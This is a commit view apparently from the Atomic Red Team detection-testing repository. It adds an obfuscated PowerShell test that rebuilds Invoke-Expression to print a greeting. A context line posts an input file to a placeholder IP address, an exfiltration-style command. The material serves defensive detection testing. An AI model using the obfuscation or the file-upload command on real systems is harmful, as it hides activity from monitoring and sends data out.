security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update T1027.yaml

Browse Source 
Added additional obfuscated PowerShell example.
This commit is contained in:
Adam Mashinchi
2021-07-26 12:46:41 -07:00
committed by GitHub
parent 4ab80721ac
commit 189ae94750
1 changed files with 12 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1027/T1027.yaml
+12
View File
@@ -150,3 +150,15 @@ atomic_tests:
command: |
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
name: powershell
- name: Obfuscated Command in PowerShell
auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
description: |
This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
supported_platforms:
- windows
executor:
command: |
$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
name: powershell